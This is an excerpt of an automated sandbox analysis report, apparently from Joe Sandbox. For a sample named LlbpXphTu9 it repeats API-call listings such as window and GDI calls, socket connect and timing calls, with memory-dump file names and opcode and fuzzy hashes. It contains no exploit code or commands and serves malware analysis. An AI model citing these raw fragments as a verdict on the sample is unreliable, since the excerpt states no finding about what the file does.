                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend_wcslen$_memset_wcspbrk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1843234404-0
                                                                                                                                                                            • Opcode ID: b21334e59b332bdcefcacb45badc01962a29afe58654cc2f886ab9dc01dd4065
                                                                                                                                                                            • Instruction ID: 2eba0e6ca7bf2f01d6f4dc0284c8cedbdf4c7ea0b5caad0642d64795040b3bc6
                                                                                                                                                                            • Opcode Fuzzy Hash: b21334e59b332bdcefcacb45badc01962a29afe58654cc2f886ab9dc01dd4065
                                                                                                                                                                            • Instruction Fuzzy Hash: 1821F87260430556E630EB15AC81BFBB3D8EBD0761F10483FEE4081280E67E9959D3AA
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 43986f9d4d7e017d9aea9f4dce7e52c9963f71054abe4abd36fa420e2ae722de
                                                                                                                                                                            • Instruction ID: 4734ce3ce40af5b77ad59fd8baedf6a3e56741e39cc50bb30d89ac3ca2d3bd52
                                                                                                                                                                            • Opcode Fuzzy Hash: 43986f9d4d7e017d9aea9f4dce7e52c9963f71054abe4abd36fa420e2ae722de
                                                                                                                                                                            • Instruction Fuzzy Hash: 1321E0712006409BCB10EF29D994D6B73A8EF45321B40466EFE5597382DB34EC08CBA9
                                                                                                                                                                            APIs
                                                                                                                                                                            • IsWindowVisible.USER32(?), ref: 00445721
                                                                                                                                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0044573C
                                                                                                                                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00445773
                                                                                                                                                                            • _wcslen.LIBCMT ref: 004457A3
                                                                                                                                                                            • CharUpperBuffW.USER32(00000000,00000000), ref: 004457AD
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3087257052-0
                                                                                                                                                                            • Opcode ID: 707967777abbcb615846d4014dd15678eb91240126a64b2d293a4799175c36b7
                                                                                                                                                                            • Instruction ID: 00e09c3d40749c53521e9302b0eb92bb7bfe2d7d521d01ead8474e6f611d5aec
                                                                                                                                                                            • Opcode Fuzzy Hash: 707967777abbcb615846d4014dd15678eb91240126a64b2d293a4799175c36b7
                                                                                                                                                                            • Instruction Fuzzy Hash: FA11E972601741BBF7105B35DC46F5B77CDAF65320F04443AF40AE6281FB69E84583AA
                                                                                                                                                                            APIs
                                                                                                                                                                            • IsWindow.USER32(00000000), ref: 00459DEF
                                                                                                                                                                            • GetForegroundWindow.USER32 ref: 00459E07
                                                                                                                                                                            • GetDC.USER32(00000000), ref: 00459E44
                                                                                                                                                                            • GetPixel.GDI32(00000000,?,00000000), ref: 00459E4F
                                                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00459E8B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4156661090-0
                                                                                                                                                                            • Opcode ID: c25ec76bf159445cc401153d518622b926736981535c7bd42fe0b2b106eefd61
                                                                                                                                                                            • Instruction ID: f25aa70a507d7fb142791e963b89e5313ab4350e7ab13503248c443e15a863bf
                                                                                                                                                                            • Opcode Fuzzy Hash: c25ec76bf159445cc401153d518622b926736981535c7bd42fe0b2b106eefd61
                                                                                                                                                                            • Instruction Fuzzy Hash: 76219D76600202ABD700EFA5CD49A5AB7E9FF84315F19483DF90597642DB78FC04CBA9
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7
                                                                                                                                                                            • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 00464985
                                                                                                                                                                            • WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,00000000), ref: 00464993
                                                                                                                                                                            • connect.WSOCK32(00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 004649CD
                                                                                                                                                                            • WSAGetLastError.WSOCK32(00000000,00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 004649F4
                                                                                                                                                                            • closesocket.WSOCK32(00000000,00000000,00000000,00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 00464A07
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 245547762-0
                                                                                                                                                                            • Opcode ID: aaa03f654d2c2080970664bbc2635e6406c59b0d093f7dcd590a1c65d79e0220
                                                                                                                                                                            • Instruction ID: b27d5ee258410aac5bd3077dd9c53ce90635b59006b610d0ec7ee295a05cd03d
                                                                                                                                                                            • Opcode Fuzzy Hash: aaa03f654d2c2080970664bbc2635e6406c59b0d093f7dcd590a1c65d79e0220
                                                                                                                                                                            • Instruction Fuzzy Hash: 3211DA712002109BD310FB2AC842F9BB3D8AF85728F04895FF594A72D2D7B9A885875A
                                                                                                                                                                            APIs
                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                                                                                            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                                                                                            • BeginPath.GDI32(?), ref: 004471B7
                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Object$Select$BeginCreateDeletePath
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2338827641-0
                                                                                                                                                                            • Opcode ID: f19e52de08adcd67550c2e9faff4417be3cdd69e9125f029607893bae639c511
                                                                                                                                                                            • Instruction ID: ab30216038401830d00444c504d41f25dcbf82a6e2307e0a418987ed8484b610
                                                                                                                                                                            • Opcode Fuzzy Hash: f19e52de08adcd67550c2e9faff4417be3cdd69e9125f029607893bae639c511
                                                                                                                                                                            • Instruction Fuzzy Hash: 7E2171B18083019FD320CF29AD44A1B7FACF74A724F14052FF654933A1EB789849CB69
                                                                                                                                                                            APIs
                                                                                                                                                                            • Sleep.KERNEL32(00000000,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043771E
                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043773C
                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043775C
                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,004448B6,0000000F,?), ref: 00437767
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2875609808-0
                                                                                                                                                                            • Opcode ID: 901ea73111326f2a8af3d8a1217edfde6b6dff748f8bb26d3b0ac17b2ce0a9c5
                                                                                                                                                                            • Instruction ID: fd8a8a83491f03de43ea78fbc63302b75a2fa5438857304713168bbc83ca9150
                                                                                                                                                                            • Opcode Fuzzy Hash: 901ea73111326f2a8af3d8a1217edfde6b6dff748f8bb26d3b0ac17b2ce0a9c5
                                                                                                                                                                            • Instruction Fuzzy Hash: EA11A3B64093119BC210EF1ADA88A8FB7F4FFD8765F004D2EF9C462250DB34D5598B9A
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32 ref: 0046FD00
                                                                                                                                                                            • SendMessageW.USER32(?,0000104C,00000000,?), ref: 0046FD2E
                                                                                                                                                                            • SendMessageW.USER32(?,00001015,?,?), ref: 0046FD4B
                                                                                                                                                                            • DestroyIcon.USER32(?), ref: 0046FD58
                                                                                                                                                                            • DestroyIcon.USER32(?), ref: 0046FD5F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$DestroyIcon
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3419509030-0
                                                                                                                                                                            • Opcode ID: a24bc400bf7eaff3d1708451a80103ed5292b50ec6011cebb58ec712c1110a53
                                                                                                                                                                            • Instruction ID: ba7c1cc62690e465ab1dcb48fa3e0f79152c3dc78d34179caeeeb49ed344ab69
                                                                                                                                                                            • Opcode Fuzzy Hash: a24bc400bf7eaff3d1708451a80103ed5292b50ec6011cebb58ec712c1110a53
                                                                                                                                                                            • Instruction Fuzzy Hash: 5F1182B15043449BE730DF14DC46BABB7E8FBC5714F00492EE6C857291D6B8A84A8B67
                                                                                                                                                                            APIs
                                                                                                                                                                            • __getptd.LIBCMT ref: 004175AE
                                                                                                                                                                              • Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
                                                                                                                                                                              • Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82
                                                                                                                                                                            • __amsg_exit.LIBCMT ref: 004175CE
                                                                                                                                                                            • __lock.LIBCMT ref: 004175DE
                                                                                                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 004175FB
                                                                                                                                                                            • InterlockedIncrement.KERNEL32(02F62D00), ref: 00417626
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4271482742-0
                                                                                                                                                                            • Opcode ID: 9041076209036267701916e3e7e7a5ecd924b858c75713c79b1599e88ef874d9
                                                                                                                                                                            • Instruction ID: de548182bd5f57d4f8c9f8a4c79293bfa6802d75d0085d2526eaa3c6a777046b
                                                                                                                                                                            • Opcode Fuzzy Hash: 9041076209036267701916e3e7e7a5ecd924b858c75713c79b1599e88ef874d9
                                                                                                                                                                            • Instruction Fuzzy Hash: 9401AD31944A11AFC710ABA998497CE7BB0BB11724F0540ABE80063791CB3CA9C1CFEE
                                                                                                                                                                            APIs
                                                                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                                                            • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Destroy$DeleteObjectWindow$Icon
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4023252218-0
                                                                                                                                                                            • Opcode ID: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
                                                                                                                                                                            • Instruction ID: d1816f9fa450f538fb043821254e2bd2cfb9ade9207d957631f6d0e9d50691b6
                                                                                                                                                                            • Opcode Fuzzy Hash: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
                                                                                                                                                                            • Instruction Fuzzy Hash: 05015E70300605ABCB20DF65D9D4B2B77A8BF14712B50452AFD04D7346EB38EC48CB69
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00460342
                                                                                                                                                                            • GetWindowTextW.USER32(00000000,00000100,00000100), ref: 00460357
                                                                                                                                                                            • MessageBeep.USER32(00000000), ref: 0046036D
                                                                                                                                                                            • KillTimer.USER32(?,0000040A), ref: 00460392
                                                                                                                                                                            • EndDialog.USER32(?,00000001), ref: 004603AB
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3741023627-0
                                                                                                                                                                            • Opcode ID: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
                                                                                                                                                                            • Instruction ID: 48c257e0c270193328064fa19c5b46d6a870d8092b70dfec968bdaebd9a60f08
                                                                                                                                                                            • Opcode Fuzzy Hash: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
                                                                                                                                                                            • Instruction Fuzzy Hash: BE018831500300A7E7209B54DE5DBDB77A8BF44B05F00492EB681A25D0E7F8A584CB55
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32(?,00001101,00000000,?), ref: 00455514
                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                                                            • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1489400265-0
                                                                                                                                                                            • Opcode ID: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
                                                                                                                                                                            • Instruction ID: 68d82c845863845e83b9d92669df32d5d1b96a6c2c0272d07869f65424c05900
                                                                                                                                                                            • Opcode Fuzzy Hash: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
                                                                                                                                                                            • Instruction Fuzzy Hash: D9014F703006419BDB10EF65DED8A2A73A9FB44712B40455AFE05DB286DB78EC49CB68
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE
                                                                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                                                            • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1042038666-0
                                                                                                                                                                            • Opcode ID: 920ee65d6839c6288c76afce6441748d32e1b72318fe83d584ccefe2da360159
                                                                                                                                                                            • Instruction ID: 707d1f3050e1f0ff98422ce5efa9f9a4d3559fdafbc0a23101ed238e91bf2869
                                                                                                                                                                            • Opcode Fuzzy Hash: 920ee65d6839c6288c76afce6441748d32e1b72318fe83d584ccefe2da360159
                                                                                                                                                                            • Instruction Fuzzy Hash: B2014B702006419BCB10AF65D9C8A2A33ACAF19322780456AFD05D7242DB28EC498B79
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2625713937-0
                                                                                                                                                                            • Opcode ID: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
                                                                                                                                                                            • Instruction ID: 1b0d13c7bbaa275692c81ef4a4760df4fcf6218f807946f7e03cce85d1463269
                                                                                                                                                                            • Opcode Fuzzy Hash: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
                                                                                                                                                                            • Instruction Fuzzy Hash: F7F0A4751052019BD7508F18EC0C70E7FA8FB4F325F04462EEA19932E0DB781546CBAD
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41
                                                                                                                                                                            • ___set_flsgetvalue.LIBCMT ref: 004140E1
                                                                                                                                                                              • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                                                                                                              • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                                                                                                              • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                                                                                                                            • ___fls_getvalue@4.LIBCMT ref: 004140EC
                                                                                                                                                                              • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                                                                                                                            • ___fls_setvalue@8.LIBCMT ref: 004140FF
                                                                                                                                                                              • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
                                                                                                                                                                            • ExitThread.KERNEL32 ref: 0041410F
                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00414115
                                                                                                                                                                            • __freefls@4.LIBCMT ref: 00414135
                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00414148
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
